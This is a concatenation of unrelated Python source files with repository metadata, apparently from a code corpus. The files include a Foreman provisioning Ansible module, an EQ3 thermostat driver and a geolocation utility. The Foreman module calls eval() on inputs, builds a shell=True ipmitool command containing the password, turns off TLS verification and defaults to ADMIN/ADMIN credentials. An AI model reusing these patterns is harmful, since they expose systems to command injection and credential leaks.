e2 = np.einsum('xpi,ypi->xy', h1, mo1)
e2 = (e2 + e2.T) * 2
return e2
def cubic_alch_hessian(mf,int_r,mo1,e1):
mo_coeff = mf.mo_coeff
mo_occ = mf.mo_occ
occidx = mo_occ > 0
orbo = mo_coeff[:, occidx]
mo1 = lib.einsum('xqi,pq->xpi', mo1, mo_coeff) #dC=UC
dm1 = lib.einsum('xpi,qi->xpq', mo1, orbo) * 2
dm1 = dm1 + dm1.transpose(0,2,1) #dP= dCOC^T+COdC'T
vresp = mf.gen_response(hermi=1)
h1ao = int_r + vresp(dm1) # dF=dV+G(dP)
# *2 for double occupancy
e3 = lib.einsum('xpq,ypi,zqi->xyz', h1ao, mo1, mo1) * 2 # trace( dC^T dF dC)
e3 -= lib.einsum('pq,xpi,yqj,zij->xyz', mf.get_ovlp(), mo1, mo1, e1) * 2 # - dC^T S dC de
e3 = (e3 + e3.transpose(1,2,0) + e3.transpose(2,0,1) +
e3.transpose(0,2,1) + e3.transpose(1,0,2) + e3.transpose(2,1,0))
return e3 | 33.798611 | 118 | 0.599959 |
6c0c27d12326a65df9bb7031122608a622ac7eb0 | 15,805 | py | Python | plugins/foreman/library/foreman_provisioner.py | fcharlier/infrared | 55f9e2651c0f5cfe45d0af7e4cf78ad46765f269 | [
"Apache-2.0"
] | null | null | null | plugins/foreman/library/foreman_provisioner.py | fcharlier/infrared | 55f9e2651c0f5cfe45d0af7e4cf78ad46765f269 | [
"Apache-2.0"
] | null | null | null | plugins/foreman/library/foreman_provisioner.py | fcharlier/infrared | 55f9e2651c0f5cfe45d0af7e4cf78ad46765f269 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/python
# coding: utf-8 -*-
# (c) 2015, Tal Kammer <tkammer@redhat.com>
#
# This module is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This software is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this software. If not, see <http://www.gnu.org/licenses/>.
import requests
import os
try:
import urlparse
except ImportError:
from urllib import parse as urlparse
DOCUMENTATION = '''
---
module: foreman_provisioner
version_added: "0.1"
short_description: Provision servers via Foreman
description:
- Provision servers via Foreman
options:
username:
description:
- login username to authenticate to Foreman
required: true
default: admin
password:
description:
- Password of login user
required: true
auth_url:
description:
- The Foreman api url
required: true
host_id:
description:
- Name or ID of the host as listed in foreman
required: true
rebuild:
description:
- Should we rebuilt the requested host
default: true
required: false
mgmt_strategy:
description:
- Whether to use Foreman or system ipmi command.
default: 'foreman'
required: false
mgmt_action:
description:
- Which command to send with the power-management selected by
mgmt_strategy. For example: reset, reboot, cycle
default: 'cycle'
required: false
ipmi_address:
description:
- Host IPMI address
default: None
required: false
ipmi_username:
description:
- Host IPMI username
default: 'ADMIN'
required: false
ipmi_password:
description:
- Host IPMI password
default: 'ADMIN'
required: false
wait_for_host:
description:
- Number of seconds we should wait for the host given the 'rebuild' state was set.
default: 10
required: false
operatingsystem_id:
description:
- The ID of operating system to set
required: false
medium_id:
description:
- The ID of Medium to set
required: false
ping_deadline:
description:
- Timeout in seconds for 'ping' command (works with 'wait_for_host')
default: 600
required: false
'''
MIN_SUPPORTED_VERSION = 2
MGMT_SUPPORTED_STRATEGIES = ['foreman', 'ipmi']
RESOURCES = {
'v2': {
'reserve': {
'url': '/api/hosts_reserve?query=name ~ {id}',
},
'release': {
'url': '/api/hosts_release?query=name ~ {id}',
},
'get': {
'url': '/api/v2/hosts/{id}',
},
'update': {
'url': '/api/v2/hosts/{id}',
},
'power': {
'url': '/api/v2/hosts/{id}/power',
},
'interfaces': {
'url': '/api/v2/hosts/{id}/interfaces',
}
}
}
class ForemanManager(object):
"""
This class represents a simple interface for foreman* to easily rebuild /
get / reserve hosts from foreman.
*Foreman: http://theforeman.org/
"""
def __init__(self, url, username, password, extra_headers=None, version=2):
"""
:param url: the url of the foreman we wish to authenticate with
:param username: the username we will use to login
:param password: the password we will use to login
:param extra_headers: if we require extra headers to be added to the
http request
:param version: the version of foreman API we wish to use (default: 2)
:type version: int
"""
if version < MIN_SUPPORTED_VERSION:
raise Exception("API version: {0} "
"is not supported at the moment".format(version))
self.session = requests.Session()
self.session.auth = (username, password)
headers = {'Accept': 'application/json',
'Content-type': 'application/json'}
if extra_headers:
headers.update(extra_headers)
self.session.headers.update(headers)
self.url = url
self.resource = RESOURCES['v2']
def compile_url(self, url, resource):
return urlparse.urljoin(url, resource)
def reserve_host(self, host_id):
"""
This method 'tags' a host as reserved in foreman
:param host_id: the name of ID of the host we wish to reserve
:returns: the host information on success, else empty body
:rtype: list of dictionaries -- [{"host": {}}]
"""
#TODO(tkammer): add the option to provide the query itself after "?"
request_url = self.compile_url(
self.url, self.resource['reserve']['url'].format(id=host_id))
response = self.session.get(request_url, verify=False)
body = response.json()
return body
def release_host(self, host_id):
"""
This method removed the 'tag' made by 'reserve_host" in foreman
:param host_id: the name or ID of the host we wish to release
:returns: the host name
:rtype: list of strings
"""
request_url = self.compile_url(
self.url, self.resource['release']['url'].format(id=host_id))
response = self.session.get(request_url, verify=False)
body = response.json()
Exception(body)
return body
def get_host(self, host_id):
"""
This method returns the host details as listed in the foreman
:param host_id: the name or ID of the host we wish to get
:returns: host information
:rtype: dict
"""
request_url = self.compile_url(
self.url, self.resource['get']['url'].format(id=host_id))
response = self.session.get(request_url, verify=False)
body = response.json()
return body
def update_host(self, host_id, update_info):
"""
This method updates a host details in foreman
:param host_id: the name or ID of the host we wish to update
:param update_info: params we wish to update on foreman
:type update_info: dict
:returns: Request's response
:rtype: dict
"""
request_url = self.compile_url(
self.url, self.resource['update']['url'].format(id=host_id))
response = self.session.put(request_url, data=update_info, verify=False)
return response.json()
def set_build_on_host(self, host_id, flag):
"""
sets the 'build' flag of a host to a given :param flag:
:param host_id: the id or name of the host as it is listed in foreman
:param flag: a boolean value (true/false) to set the build flag with
"""
self.update_host(host_id, json.dumps({'build': flag}))
self.get_host(host_id)
if self.get_host(host_id).get('build') != flag:
raise Exception("Failed setting build on host {0}".format(host_id))
def set_host_os(self, host_id, os_id, medium_id):
"""Sets host's operating system
:param host_id: Host's FQDN/ID
:param os_id: Operating system ID to set
:param medium_id: Medium ID to set
"""
os_data = {}
if os_id:
os_data['operatingsystem_id'] = os_id
if medium_id:
os_data['medium_id'] = medium_id
# Nothing to update
if not os_data:
return
res_body = self.update_host(host_id, json.dumps({'host': os_data}))
# Validates change
if os_id and (res_body.get('operatingsystem_id') != eval(os_id)):
raise Exception(
"Failed to set 'operatingsystem_id' - Expected '{}' but got '"
"{}'.".format(eval(os_id), res_body.get('operatingsystem_id')))
if medium_id and (res_body.get('medium_id') != eval(medium_id)):
raise Exception(
"Failed to set 'medium_id' - Expected '{}' but got '{}'."
"".format(eval(medium_id), res_body.get('medium_id')))
def bmc(self, host_id, command):
"""
execute a command through the BMC plugin (on/off/restart/shutdown/etc)
:param host_id: the id or name of the host as it is listed in foreman
:param command: the command to send through the BMC plugin, supported
commands: 'status', 'on', 'off', 'cycle', 'reset', 'soft'
"""
request_url = self.compile_url(
self.url, self.resource['power']['url'].format(id=host_id))
command = json.dumps({'power_action': command})
response = self.session.put(request_url, data=command, verify=False)
#TODO(tkammer): add verification that the BMC command was issued
def ipmi(self, host_id, command, username, password):
"""
execute a command through the ipmitool
:param host_id: the ipmi id of the host
:param command: the command to send through the ipmitool
:param username: host IPMI username
:param password: host IPMI password
commands: 'status', 'on', 'off', 'cycle', 'reset', 'soft' # TBD
"""
command = "ipmitool -I lanplus -H {host_id} -U {username} -P " \
"{password} chassis power {cmd}".format(
host_id=host_id, username=username, password=password, cmd=command)
return_code = subprocess.call(command, shell=True)
if return_code:
raise Exception("Call to {0}, returned with {1}".format(command, return_code))
def _validate_bmc(self, host_id):
"""
This method validate that there is at least one BMC on the given host
:param host_id: the id or name of the host as it is listed in foreman
"""
request_url = self.compile_url(
self.url, self.resource['interfaces']['url'].format(id=host_id))
response = self.session.get(request_url, verify=False)
body = response.json()
missing_bmc = True
for interface in body['results']:
if "BMC" in interface['type'].upper():
missing_bmc = False
break
return missing_bmc
def provision(self, host_id, mgmt_strategy, mgmt_action, ipmi_address,
ipmi_username, ipmi_password, operatingsystem_id, medium_id,
ping_deadline, wait_for_host=10):
"""
This method rebuilds a machine, doing so by running get_host and bmc.
:param host_id: the name or ID of the host we wish to rebuild
:param mgmt_strategy: the way we wish to reboot the machine
(i.e: foreman, ipmi, etc)
:param mgmt_action: the action we wish to use with the strategy
(e.g: cycle, reset, etc)
:param wait_for_host: number of seconds the function waits after host
finished rebuilding before checking connectivity
:param ipmi_address: remote server address (IPMI)
:param ipmi_username: remote server username (IPMI)
:param ipmi_password: remote server password (IPMI)
:param operatingsystem_id: Operating system ID
:param medium_id: Medium ID
:param ping_deadline: Timeout in seconds for 'ping' command
(works with 'wait_for_host')
:raises: KeyError if BMC hasn't been found on the given host
Exception in case of machine could not be reached after
rebuild
"""
wait_for_host = int(wait_for_host)
building_host = self.get_host(host_id)
self.set_host_os(host_id, operatingsystem_id, medium_id)
self.set_build_on_host(host_id, True)
if mgmt_strategy == 'foreman':
if self._validate_bmc(host_id):
raise KeyError("BMC not found on {}".format(host_id))
self.bmc(host_id, mgmt_action)
elif mgmt_strategy == 'ipmi':
if ipmi_address:
host_ipmi = ipmi_address
elif 'interfaces' in building_host and len(building_host.get('interfaces')) > 0:
# host found in foreman entry
host_ipmi = building_host.get('interfaces')[0].get('name')
else:
# Host isn't specified nor found in foreman
raise Exception("Unknown IPMI address for foreman host: {0}. "
"".format(host_id))
self.ipmi(host_ipmi, mgmt_action, ipmi_username, ipmi_password)
else:
raise Exception("{0} is not a supported "
"management strategy".format(mgmt_strategy))
if wait_for_host:
while self.get_host(host_id).get('build'):
time.sleep(wait_for_host)
command = "ping -q -c 30 -w {0} {1}".format(
ping_deadline, building_host.get('name'))
return_code = subprocess.call(command, shell=True)
if return_code:
raise Exception("Could not reach {0}, rc={1}, cmd={2}".format(host_id, return_code, command))
def main():
module = AnsibleModule(
argument_spec=dict(
username=dict(default='admin'),
password=dict(required=True),
auth_url=dict(required=True),
host_id=dict(required=True),
rebuild=dict(default=True, type='bool', choices=BOOLEANS),
mgmt_strategy=dict(default='foreman',
choices=MGMT_SUPPORTED_STRATEGIES),
mgmt_action=dict(default='cycle', choices=['on', 'off', 'cycle',
'reset', 'soft']),
wait_for_host=dict(default=10),
ping_deadline=dict(default=600),
ipmi_address=dict(default=None),
ipmi_username=dict(default='ADMIN'),
ipmi_password=dict(default='ADMIN'),
operatingsystem_id=dict(default=None),
medium_id=dict(default=None)))
foreman_client = ForemanManager(url=module.params['auth_url'],
username=module.params['username'],
password=module.params['password'])
status_changed = False
if module.boolean(module.params['rebuild']):
try:
foreman_client.provision(module.params['host_id'],
module.params['mgmt_strategy'],
module.params['mgmt_action'],
module.params['ipmi_address'],
module.params['ipmi_username'],
module.params['ipmi_password'],
module.params['operatingsystem_id'],
module.params['medium_id'],
module.params['ping_deadline'],
module.params['wait_for_host'])
except KeyError as e:
module.fail_json(msg=e.message)
else:
status_changed = True
#TODO(tkammer): implement RESERVE and RELEASE
host = foreman_client.get_host(module.params['host_id'])
interface = foreman_client.get_host('{0}/interfaces'.format(module.params['host_id']))
if host.has_key('error'):
module.fail_json(msg=host['error'])
module.exit_json(changed=status_changed, host=host, interface=interface)
from ansible.module_utils.basic import *
main()
| 37.541568 | 109 | 0.598671 |
805efd02113ee8ca89435994ca7c275eb4eb8662 | 700 | py | Python | mlrose_hiive/neural/activation/tanh.py | sridatta/mlrose | d9fe33df157bd801a33b13a803d737c4f8e48ebb | [
"BSD-3-Clause"
] | 63 | 2019-09-24T14:09:51.000Z | 2022-03-09T02:36:25.000Z | mlrose_hiive/neural/activation/tanh.py | kunla/mlrose | 306c96b156182a847f5c9e6ffb62eb805d266fef | [
"BSD-3-Clause"
] | 6 | 2019-10-04T01:04:21.000Z | 2021-08-31T19:06:13.000Z | mlrose_hiive/neural/activation/tanh.py | kunla/mlrose | 306c96b156182a847f5c9e6ffb62eb805d266fef | [
"BSD-3-Clause"
] | 104 | 2019-09-23T22:44:43.000Z | 2022-03-13T18:50:53.000Z | """ Neural network activation functions."""
# Author: Genevieve Hayes (Modified by Andrew Rollings)
# License: BSD 3 clause
from mlrose_hiive.decorators import short_name
import numpy as np
import warnings
warnings.filterwarnings("ignore")
@short_name('tanh')
def tanh(x, deriv=False):
"""Hyperbolic tan activation function
Parameters
----------
x: array
Array containing input data.
deriv: bool, default: False
Whether to return the function or its derivative.
Set True for derivative.
Returns
-------
fx: array
Value of activation function at x
"""
fx = np.tanh(x)
if deriv:
fx = 1 - fx**2
return fx
| 18.918919 | 57 | 0.641429 |
45bc291b5f42c8d35b844d79b58cc4a999b00914 | 65 | py | Python | notesave/cli.py | ninjamar/NoteSave | b16b06d49589ea7a6a3547fe5342d7daa92918fe | [
"MIT"
] | null | null | null | notesave/cli.py | ninjamar/NoteSave | b16b06d49589ea7a6a3547fe5342d7daa92918fe | [
"MIT"
] | null | null | null | notesave/cli.py | ninjamar/NoteSave | b16b06d49589ea7a6a3547fe5342d7daa92918fe | [
"MIT"
] | null | null | null | from . import NoteSaver
def main():
n = NoteSaver()
n.cli()
| 10.833333 | 23 | 0.615385 |
862b58d656fffe82de55c15dd031e056e4f9dd6e | 605 | py | Python | testprojects/src/python/interpreter_selection/python_3_selection_testing/lib_py2.py | AllClearID/pants | c4fdf00a3bdf9f26f876e85c46909d0729f7132c | [
"Apache-2.0"
] | 1 | 2018-12-10T21:31:02.000Z | 2018-12-10T21:31:02.000Z | testprojects/src/python/interpreter_selection/python_3_selection_testing/lib_py2.py | AllClearID/pants | c4fdf00a3bdf9f26f876e85c46909d0729f7132c | [
"Apache-2.0"
] | 2 | 2016-10-13T21:37:42.000Z | 2018-07-20T20:14:33.000Z | testprojects/src/python/interpreter_selection/python_3_selection_testing/lib_py2.py | AllClearID/pants | c4fdf00a3bdf9f26f876e85c46909d0729f7132c | [
"Apache-2.0"
] | 1 | 2018-03-08T22:21:44.000Z | 2018-03-08T22:21:44.000Z | # coding=utf-8
# Copyright 2017 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
# A simple example to include in a python 2 binary target
def say_something():
print('I am a python 2 library method.')
# Note that ascii exists as a built-in in Python 3 and
# does not exist in Python 2.
try:
ret = ascii
except NameError:
ret = None
assert ret is None
return ret
| 28.809524 | 93 | 0.712397 |
5897da0c4844474bed09461351572178b74534bf | 234 | py | Python | setup.py | jeckt/hungry-then-sleepy | 53684d7a2f86e8c01ba1cb0a37327d5786e08785 | [
"Apache-2.0"
] | null | null | null | setup.py | jeckt/hungry-then-sleepy | 53684d7a2f86e8c01ba1cb0a37327d5786e08785 | [
"Apache-2.0"
] | null | null | null | setup.py | jeckt/hungry-then-sleepy | 53684d7a2f86e8c01ba1cb0a37327d5786e08785 | [
"Apache-2.0"
] | null | null | null | from setuptools import find_packages, setup
setup(
name='hungry-then-sleepy',
version='1.0.0',
packages=find_packages(),
include_package_data=True,
zip_safe=False,
install_requires=[
'flask',
],
)
| 18 | 43 | 0.649573 |
d65fc31f0ec9bf57cbb2c9dfdb3089194fd0ae7e | 1,130 | py | Python | waldur_core/quotas/managers.py | PrintScr/waldur-core | db9f46619984d9c1e8b62f1aba89a69369ade08a | [
"MIT"
] | 23 | 2015-01-15T13:29:53.000Z | 2017-05-04T05:12:24.000Z | waldur_core/quotas/managers.py | opennode/nodeconductor | d6c17a9592bb6c49c33567542eef8d099605a46a | [
"MIT"
] | null | null | null | waldur_core/quotas/managers.py | opennode/nodeconductor | d6c17a9592bb6c49c33567542eef8d099605a46a | [
"MIT"
] | 8 | 2015-01-11T18:51:47.000Z | 2017-06-29T18:53:12.000Z | from django.contrib.contenttypes import models as ct_models
from django.db import models
from django.db.models import Q
from waldur_core.core.managers import GenericKeyMixin
class QuotaManager(GenericKeyMixin, models.Manager):
def filtered_for_user(self, user, queryset=None):
from waldur_core.quotas import utils
if queryset is None:
queryset = self.get_queryset()
# XXX: This circular dependency will be removed then filter_queryset_for_user
# will be moved to model manager method
from waldur_core.structure.managers import filter_queryset_for_user
if user.is_staff or user.is_support:
return queryset
quota_scope_models = utils.get_models_with_quotas()
query = Q()
for model in quota_scope_models:
user_object_ids = filter_queryset_for_user(model.objects.all(), user).values_list('id', flat=True)
content_type_id = ct_models.ContentType.objects.get_for_model(model).id
query |= Q(object_id__in=user_object_ids, content_type_id=content_type_id)
return queryset.filter(query)
| 37.666667 | 110 | 0.723894 |
8e939218a5556e5a9892acdb69bdb28ea284fe13 | 545 | py | Python | adafruit-circuitpython-bundle-py-20201107/examples/circuitplayground_buttons_neopixels.py | rantler/AdaFruit | 9b0aa56ede9ac358b835162cad4c6531c09ba5b0 | [
"CC0-1.0"
] | null | null | null | adafruit-circuitpython-bundle-py-20201107/examples/circuitplayground_buttons_neopixels.py | rantler/AdaFruit | 9b0aa56ede9ac358b835162cad4c6531c09ba5b0 | [
"CC0-1.0"
] | null | null | null | adafruit-circuitpython-bundle-py-20201107/examples/circuitplayground_buttons_neopixels.py | rantler/AdaFruit | 9b0aa56ede9ac358b835162cad4c6531c09ba5b0 | [
"CC0-1.0"
] | null | null | null | """This example lights up half the NeoPixels red while button A is being pressed, and half the
NeoPixels green while button B is being pressed."""
from adafruit_circuitplayground import cp
cp.pixels.brightness = 0.3
cp.pixels.fill((0, 0, 0)) # Turn off the NeoPixels if they're on!
while True:
if cp.button_a:
cp.pixels[0:5] = [(255, 0, 0)] * 5
else:
cp.pixels[0:5] = [(0, 0, 0)] * 5
if cp.button_b:
cp.pixels[5:10] = [(0, 255, 0)] * 5
else:
cp.pixels[5:10] = [(0, 0, 0)] * 5
| 30.277778 | 95 | 0.585321 |
a1f826b46ff8438a0bc1592ec5c87ffef8063bd4 | 1,615 | py | Python | tests/conftest.py | butsyk/github3.py | 72fa5125fce75c916733839963554765c907e9e7 | [
"BSD-3-Clause"
] | 1 | 2019-04-23T07:16:07.000Z | 2019-04-23T07:16:07.000Z | tests/conftest.py | butsyk/github3.py | 72fa5125fce75c916733839963554765c907e9e7 | [
"BSD-3-Clause"
] | 4 | 2020-10-19T13:02:37.000Z | 2020-10-25T19:01:25.000Z | tests/conftest.py | butsyk/github3.py | 72fa5125fce75c916733839963554765c907e9e7 | [
"BSD-3-Clause"
] | 1 | 2020-03-06T06:30:51.000Z | 2020-03-06T06:30:51.000Z | import base64
import betamax
import os
import pytest
from betamax_matchers import json_body
credentials = [
os.environ.get("GH_USER", "foo").encode(),
os.environ.get("GH_PASSWORD", "bar").encode(),
]
betamax.Betamax.register_request_matcher(json_body.JSONBodyMatcher)
with betamax.Betamax.configure() as config:
config.cassette_library_dir = "tests/cassettes"
record_mode = os.environ.get("GH_RECORD_MODE", "once")
config.default_cassette_options["record_mode"] = record_mode
config.define_cassette_placeholder(
"<AUTH_TOKEN>", os.environ.get("GH_AUTH", "x" * 20)
)
config.default_cassette_options["match_requests_on"].append("json-body")
config.define_cassette_placeholder(
"<BASIC_AUTH>", base64.b64encode(b":".join(credentials)).decode()
)
@pytest.fixture
def betamax_simple_body(request):
"""Return configuration to match cassette on uri, method and body."""
request.cls.betamax_simple_body = {
"match_requests_on": ["uri", "method", "body"]
}
@pytest.fixture
def enterprise_url(request):
"""Configure class with enterprise url."""
request.cls.enterprise_url = "https://enterprise.github3.com"
class IfNoneMatchMatcher(betamax.BaseMatcher):
name = "if-none-match"
def match(self, request, recorded_request):
request_header = request.headers.get("If-None-Match")
recorded_header = recorded_request["headers"].get("If-None-Match")
matches = True if request_header == recorded_header else False
return matches
betamax.Betamax.register_request_matcher(IfNoneMatchMatcher)
| 27.372881 | 76 | 0.719505 |
ae3e65d4f09a090c39d6a363460a2dccbd750bb1 | 4,191 | py | Python | qtoggleserver/eq3bt/eq3btthermostat.py | qtoggle/qtoggleserver-eq3bt | 593efac456d5fc69e2b5977a9403bdc19c44e07e | [
"Apache-2.0"
] | null | null | null | qtoggleserver/eq3bt/eq3btthermostat.py | qtoggle/qtoggleserver-eq3bt | 593efac456d5fc69e2b5977a9403bdc19c44e07e | [
"Apache-2.0"
] | null | null | null | qtoggleserver/eq3bt/eq3btthermostat.py | qtoggle/qtoggleserver-eq3bt | 593efac456d5fc69e2b5977a9403bdc19c44e07e | [
"Apache-2.0"
] | null | null | null |
import datetime
from typing import List, Optional, Type
from qtoggleserver.core import ports as core_ports
from qtoggleserver.lib import ble
from .exceptions import EQ3Exception
class EQ3BTThermostat(ble.BLEPeripheral):
WRITE_HANDLE = 0x0410
NOTIFY_HANDLE = 0x0420
STATUS_SEND_HEADER = 0x03
STATUS_RECV_HEADER = 0x02
STATUS_MANUAL_MASK = 0x01
STATUS_BOOST_MASK = 0x04
STATUS_LOCKED_MASK = 0x20
STATUS_BITS_INDEX = 2
STATUS_TEMP_INDEX = 5
WRITE_TEMP_HEADER = 0x41
WRITE_MANUAL_HEADER = 0x40
WRITE_BOOST_HEADER = 0x45
WRITE_LOCKED_HEADER = 0x80
def __init__(self, **kwargs) -> None:
super().__init__(**kwargs)
self._temp: Optional[float] = None
self._manual: Optional[bool] = False
self._boost: Optional[bool] = False
self._locked: Optional[bool] = False
async def set_temp(self, temp: float) -> None:
self.debug('setting temperature to %.1f degrees', temp)
await self.write(self.WRITE_HANDLE, bytes([self.WRITE_TEMP_HEADER, int(temp * 2)]))
self.debug('successfully set temperature')
self._temp = temp
def get_temp(self) -> Optional[float]:
return self._temp
async def set_manual(self, manual: bool) -> None:
self.debug('%s manual mode', ['disabling', 'enabling'][manual])
await self.write(self.WRITE_HANDLE, bytes([self.WRITE_MANUAL_HEADER, 0x40 if manual else 0x00]))
self.debug('successfully set manual mode')
self._manual = manual
def get_manual(self) -> Optional[bool]:
return self._manual
async def set_boost(self, boost: bool) -> None:
self.debug('%s boost', ['disabling', 'enabling'][boost])
await self.write(self.WRITE_HANDLE, bytes([self.WRITE_BOOST_HEADER, int(boost)]))
self.debug('successfully set boost')
self._boost = boost
def get_boost(self) -> Optional[bool]:
return self._boost
async def set_locked(self, locked: bool) -> None:
self.debug(['unlocked', 'locked'][locked])
await self.write(self.WRITE_HANDLE, bytes([self.WRITE_LOCKED_HEADER, int(locked)]))
self.debug('successfully set locked')
self._locked = locked
def get_locked(self) -> Optional[bool]:
return self._locked
async def make_port_args(self) -> List[Type[core_ports.BasePort]]:
from .ports import Temperature, Manual, Boost, Locked
return [
Temperature,
Manual,
Boost,
Locked
]
async def poll(self) -> None:
await self._read_config()
async def _read_config(self) -> None:
# Reset polled values so that, in case of error, old values aren't reused
self._temp = None
self._boost = None
data = await self.write_wait_notify(
self.WRITE_HANDLE,
self.NOTIFY_HANDLE,
bytes([self.STATUS_SEND_HEADER] + self._make_status_value()),
)
if not data:
raise EQ3Exception('Null notification data')
if len(data) < 6:
raise EQ3Exception(f'Notification data too short {self.pretty_data(data)}')
if data[0] != self.STATUS_RECV_HEADER:
raise EQ3Exception(f'Unexpected notification data header: {data[0]:02X}')
self._temp = data[self.STATUS_TEMP_INDEX] / 2.0
self._manual = bool(data[self.STATUS_BITS_INDEX] & self.STATUS_MANUAL_MASK)
self._boost = bool(data[self.STATUS_BITS_INDEX] & self.STATUS_BOOST_MASK)
self._locked = bool(data[self.STATUS_BITS_INDEX] & self.STATUS_LOCKED_MASK)
self.debug('temperature is %.1f degrees', self._temp)
self.debug('manual mode is %s', ['disabled', 'enabled'][self._manual])
self.debug('boost mode is %s', ['disabled', 'enabled'][self._boost])
self.debug('thermostat is %s', ['unlocked', 'locked'][self._locked])
@staticmethod
def _make_status_value() -> List[int]:
now = datetime.datetime.now()
return [
now.year - 2000,
now.month,
now.day,
now.hour,
now.minute,
now.second
]
| 31.276119 | 104 | 0.634693 |
8c3416273608cba7dd4a03c6f549226c153b6f3c | 13,228 | py | Python | zodo/utils.py | ZooPhy/zodo-services | b065c3967d831fae1a22a2e9c351d49437d1d02c | [
"Apache-2.0"
] | 1 | 2022-02-06T16:01:08.000Z | 2022-02-06T16:01:08.000Z | zodo/utils.py | ZooPhy/zodo-services | b065c3967d831fae1a22a2e9c351d49437d1d02c | [
"Apache-2.0"
] | 7 | 2020-09-01T19:18:29.000Z | 2022-02-10T01:45:33.000Z | zodo/utils.py | ZooPhy/zodo-services | b065c3967d831fae1a22a2e9c351d49437d1d02c | [
"Apache-2.0"
] | 1 | 2020-09-18T21:21:56.000Z | 2020-09-18T21:21:56.000Z | """Utility functions for loading datasets and computing NER performance"""
import copy
import json
import logging
import re
import shutil
import sys
import tarfile
import time
import urllib.request as request
import xml.etree.ElementTree as ET
from collections import OrderedDict
from contextlib import closing
from typing import List
from os import listdir
from os.path import join
import jsonpickle
import redis
import regex as nre
import requests
import textract
from bioc import biocjson
from requests.utils import quote
from zodo.ner.ner_utils import LOC_ANN_TAG, detect, load_ner
from zodo.settings import (EXTRACT_SUPPLEMENTAL, SUPPLEMENTAL_DATA_DIR, SUPPLEMENTAL_DATA_FILETYPES,
GEO_HOST, GEO_PORT)
CLEANUP_REGEX = r"(\s+|\-|\.|\"|\(|\)|\\|\?|\!|\/|\:|\;|\_|\+|\`|\[|\]|\#|\*|\%|\<|\>|\=)"
GB_COUNTRY_FIELD_REGEX = r"(.*):(.*)"
FTP_REGEX = r"format=\"tgz\" .* href=\"(.*)\""
MODE_STRICT = 1
MODE_EXPANDED = 2
MODE_DESPERATE = 3
GEO_STOPWORDS_RE = r'|'.join(["Southcentral", "Interior", "Northwestern", "Northeastern", "Southwestern", "Southeastern",
"Central"])
# All url's have PH i.e Placeholders that will be replaced during the query
GEONAMES_URL = "http://"+GEO_HOST+":"+GEO_PORT+"/location?location=LPH&count=CPH&mode=MPH"
PUBMED_URL = "https://www.ncbi.nlm.nih.gov/research/bionlp/RESTful/pubmed.cgi/BioC_json/PMPH/unicode"
PMCOA_URL = "https://www.ncbi.nlm.nih.gov/research/bionlp/RESTful/pmcoa.cgi/BioC_json/PMCOAPH/unicode"
PMC_OA_FTP_URL = "https://www.ncbi.nlm.nih.gov/pmc/utils/oa/oa.fcgi?id=IDPH"
FULL_CONFIDENCE_GEOCODES = ["CONT", "PCLI", "PCLH", "RGN", "PEN"]
class NamedEntityObj(object):
'''Named Entity object which contains offsets, location and possible locations'''
def __init__(self, span, best_loc=None, poss_locs=[], probability=0.01):
# placeholders
self.span = span
self.best_loc = best_loc
self.poss_locs = poss_locs
self.probability = probability
def __str__(self):
return str(self.__class__) + ": " + str(self.__dict__)
def serialize(self, minimal=True):
'''returns serialized object for conversion to json'''
if minimal:
return {'span': self.span.serialize(),
'best_loc': self.best_loc,
'probability': self.probability,
}
else:
return {'span': self.span.serialize(),
'best_loc': self.best_loc,
'probability': self.probability,
'poss_locs': self.poss_locs
}
def load_static_objects(args):
'''Load all the static objects like the NER Graph'''
load_ner(args)
def extract_probability(records):
'''Extract probability based on hueristics'''
# if the location is a country/continent/region, the first record will have the big codes
# there's no point in keeping the other locations as possible
# TODO: need to double check with string similarity as well
if records and records[0]["Code"] in FULL_CONFIDENCE_GEOCODES:
# logging.debug("Country/Continent/Region detected, removing alternatives: %s", records[0]["Name"])
records = records[:1]
# For population heuristic, set probability based on total population in the retrieved records
total_pop = sum([int(x["Population"]) for x in records if "Population" in x])
# TODO: assign probability based on string similarity as well
for record in records:
try:
probability = (int(record["Population"]) + 0.00000001)/(total_pop + 0.000001)
record["Probability"] = probability
except Exception as err:
logging.error("ERROR: %s for %s", err, record)
return records
def get_formatted_locs(location, mode=MODE_STRICT):
'''Get all possible locations for better desperate search'''
all_locs = []
# Cleanup and format string
clean_loc, finer_loc = location.strip(), ""
# If string contains a colon it is in GenBank format, so format it
gb_format = re.search(GB_COUNTRY_FIELD_REGEX, clean_loc)
if gb_format:
country = gb_format.group(1)
finer_loc = gb_format.group(2)
if "-" in finer_loc:
finer_loc = ", ".join([x.strip() for x in gb_format.group(2).split("-")])
clean_loc = finer_loc.strip() + ", " + country.strip()
all_locs.append(clean_loc)
# there are times when the locations are reversed
if finer_loc and "," in finer_loc:
finer_loc = ",".join([loc for loc in reversed(finer_loc.split(","))])
clean_loc = finer_loc.strip() + ", " + country.strip()
all_locs.append(clean_loc)
if mode != MODE_STRICT and clean_loc.split(","):
clean_loc = clean_loc.split(",")
for loc in clean_loc[:-1]:
trunc_loc = loc.strip() + ", " + clean_loc[-1].strip()
if trunc_loc not in all_locs:
all_locs.append(trunc_loc)
trunc_loc = re.sub(GEO_STOPWORDS_RE, "", trunc_loc, re.IGNORECASE)
if trunc_loc not in all_locs:
all_locs.append(trunc_loc.strip())
# Custom modifications
if trunc_loc.startswith("St"):
trunc_loc.replace("St", "Saint")
elif trunc_loc.startswith("Saint"):
trunc_loc.replace("Saint", "St")
if trunc_loc not in all_locs:
all_locs.append(trunc_loc)
if mode == MODE_DESPERATE:
last_loc = clean_loc[-1]
if last_loc not in all_locs:
all_locs.append(last_loc)
return all_locs
def lookup_location_pop(location, mode=MODE_STRICT, count=1, debug=False):
'''Get Geoname Record using the location APIs and population heuristic'''
loc = []
all_locs = get_formatted_locs(location, mode)
for clean_loc in all_locs:
clean_loc = re.sub(CLEANUP_REGEX, ' ', clean_loc)
clean_loc = clean_loc.strip()
# search by comma splits, beneficial for country and strain fields
full = "full" if mode == MODE_DESPERATE else "default"
if clean_loc:
